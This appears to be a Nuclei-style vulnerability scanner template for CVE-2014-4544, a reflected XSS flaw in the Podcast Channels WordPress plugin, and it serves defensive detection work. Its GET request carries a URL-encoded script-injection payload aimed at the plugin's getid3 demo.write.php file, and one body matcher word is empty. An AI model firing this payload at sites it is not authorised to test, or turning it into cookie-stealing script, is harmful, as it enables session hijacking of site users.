id: CVE-2014-4544 info: name: Podcast Channels < 0.28 - Cross-Site Scripting author: daffainfo severity: medium description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Podcast Channels plugin (0.28 or higher) to fix this vulnerability. reference: - https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb - https://nvd.nist.gov/vuln/detail/CVE-2014-4544 - http://codevigilant.com/disclosure/wp-plugin-podcast-channels-a3-cross-site-scripting-xss - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2014-4544 cwe-id: CWE-79 epss-score: 0.00118 epss-percentile: 0.45869 cpe: cpe:2.3:a:podcast_channels_project:podcast_channels:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 vendor: podcast_channels_project product: podcast_channels framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,podcast_channels_project http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a0046304402203b9e90974629c38dc7ba24b6c065893128fb49899c54b1d432a9354d6bf979f1022069e559bb2ed3a7b79110890ab03412a524f3603138b600753467d200c26c1f29:922c64590222798bb761d5b6d8e72950